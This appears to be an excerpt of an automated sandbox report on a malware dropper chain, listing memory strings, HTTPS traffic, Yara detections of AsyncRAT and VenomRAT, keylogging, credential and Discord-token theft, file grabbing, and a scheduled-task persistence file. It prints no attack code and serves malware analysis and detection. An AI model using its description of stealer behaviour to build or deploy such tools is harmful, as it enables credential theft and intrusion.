Source: H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000028.00000002.3174623487.0000000004605000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 75f24a4b40.exe, 00000030.00000003.3282121599.000000000547D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 00000011.00000002.3089463536.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3084016917.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3173110956.0000000006207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.3194052171.0000000005518000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: places.raw.7.dr	String found in binary or memory: https://support.mozilla.org
Source: places.raw.7.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 75f24a4b40.exe, 00000030.00000003.3276738308.0000000005713000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: places.raw.7.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: H3tyh96.exe, 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000005033000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn
Source: 75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: 75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3282121599.000000000547D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.raw.7.dr	String found in binary or memory: https://www.mozilla.org
Source: places.raw.7.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: places.raw.7.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: H3tyh96.exe, 00000007.00000003.3115713877.0000000006253000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3084062962.0000000005ED7000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3276738308.0000000005713000.00000004.00000800.00020000.00000000.sdmp, places.raw.7.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: places.raw.7.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: H3tyh96.exe, 00000007.00000003.3115713877.0000000006253000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3084062962.0000000005ED7000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3276738308.0000000005713000.00000004.00000800.00020000.00000000.sdmp, places.raw.7.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: H3tyh96.exe, 00000007.00000003.3115713877.0000000006253000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3084062962.0000000005ED7000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3276738308.0000000005713000.00000004.00000800.00020000.00000000.sdmp, places.raw.7.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: H3tyh96.exe, 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: H3tyh96.exe, 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: ae44c30d83.exe, 00000033.00000003.3191329684.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49935 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50095 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.H3tyh96.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3299025371.00000000003B2000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2801862363.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: 22.0.ClientAny.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ClientAny.exe PID: 7160, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ClientAny.exe, type: DROPPED

Contains functionality to log keystrokes (.Net Source)

Source: ClientAny.exe.7.dr, Keylogger.cs

.Net Code: KeyboardLayout

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	File deleted: C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.xlsx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	File deleted: C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW.xlsx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	File deleted: C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\DUUDTUBZFW.xlsx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	File deleted: C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\DUUDTUBZFW.xlsx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	File deleted: C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\EWZCVGNOWT.jpg	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 22.0.ClientAny.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 7.2.H3tyh96.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 7.2.H3tyh96.exe.8ec0000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 7.2.H3tyh96.exe.8ec0000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 7.2.H3tyh96.exe.8ec0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 7.2.H3tyh96.exe.8ec0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 7.2.H3tyh96.exe.9b90000.16.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.H3tyh96.exe.9b90000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: ae44c30d83.exe, 00000033.00000002.3197309870.0000000000D92000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_57272244-c
Source: ae44c30d83.exe, 00000033.00000002.3197309870.0000000000D92000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_7340eded-4

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: H3tyh96[1].exe.6.dr	Static PE information: section name:
Source: H3tyh96[1].exe.6.dr	Static PE information: section name: .idata
Source: H3tyh96[1].exe.6.dr	Static PE information: section name:
Source: H3tyh96.exe.6.dr	Static PE information: section name:
Source: H3tyh96.exe.6.dr	Static PE information: section name: .idata
Source: H3tyh96.exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: 75f24a4b40.exe.6.dr	Static PE information: section name:
Source: 75f24a4b40.exe.6.dr	Static PE information: section name: .idata
Source: 75f24a4b40.exe.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: section name:
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: section name: .idata
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: .idata
Source: 2fdabbc809.exe.6.dr	Static PE information: section name:
Source: 2fdabbc809.exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: f2da6a22b2.exe.6.dr	Static PE information: section name:
Source: f2da6a22b2.exe.6.dr	Static PE information: section name: .idata
Source: f2da6a22b2.exe.6.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0029CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	6_2_0029CB97
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_04B832C8 NtProtectVirtualMemory,	7_2_04B832C8
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_04B82E73 NtProtectVirtualMemory,	7_2_04B82E73

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C8860	0_2_003C8860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C7049	0_2_003C7049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C78BB	0_2_003C78BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C31A8	0_2_003C31A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00384B30	0_2_00384B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C2D10	0_2_003C2D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00384DE0	0_2_00384DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003B7F36	0_2_003B7F36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C779B	0_2_003C779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_002C8860	2_2_002C8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_002C7049	2_2_002C7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_002C78BB	2_2_002C78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_002C31A8	2_2_002C31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00284B30	2_2_00284B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_002C2D10	2_2_002C2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00284DE0	2_2_00284DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_002B7F36	2_2_002B7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_002C779B	2_2_002C779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_002C8860	3_2_002C8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_002C7049	3_2_002C7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_002C78BB	3_2_002C78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_002C31A8	3_2_002C31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00284B30	3_2_00284B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_002C2D10	3_2_002C2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00284DE0	3_2_00284DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_002B7F36	3_2_002B7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_002C779B	3_2_002C779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0028E530	6_2_0028E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002A6192	6_2_002A6192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002C8860	6_2_002C8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00284B30	6_2_00284B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002C2D10	6_2_002C2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00284DE0	6_2_00284DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002A0E13	6_2_002A0E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002C7049	6_2_002C7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002C31A8	6_2_002C31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002A1602	6_2_002A1602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002C779B	6_2_002C779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002C78BB	6_2_002C78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002A3DF1	6_2_002A3DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002B7F36	6_2_002B7F36
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_04B826F8	7_2_04B826F8
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_04B826E7	7_2_04B826E7
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_04B82E73	7_2_04B82E73
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_08022BD0	7_2_08022BD0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0802E798	7_2_0802E798
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_080219A0	7_2_080219A0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_08B41109	7_2_08B41109
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_08B48240	7_2_08B48240
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_08B493AE	7_2_08B493AE
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_08B453F0	7_2_08B453F0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_08B41DE0	7_2_08B41DE0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_08B4A400	7_2_08B4A400
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_08B41DD1	7_2_08B41DD1
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0912BE28	7_2_0912BE28
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09120040	7_2_09120040
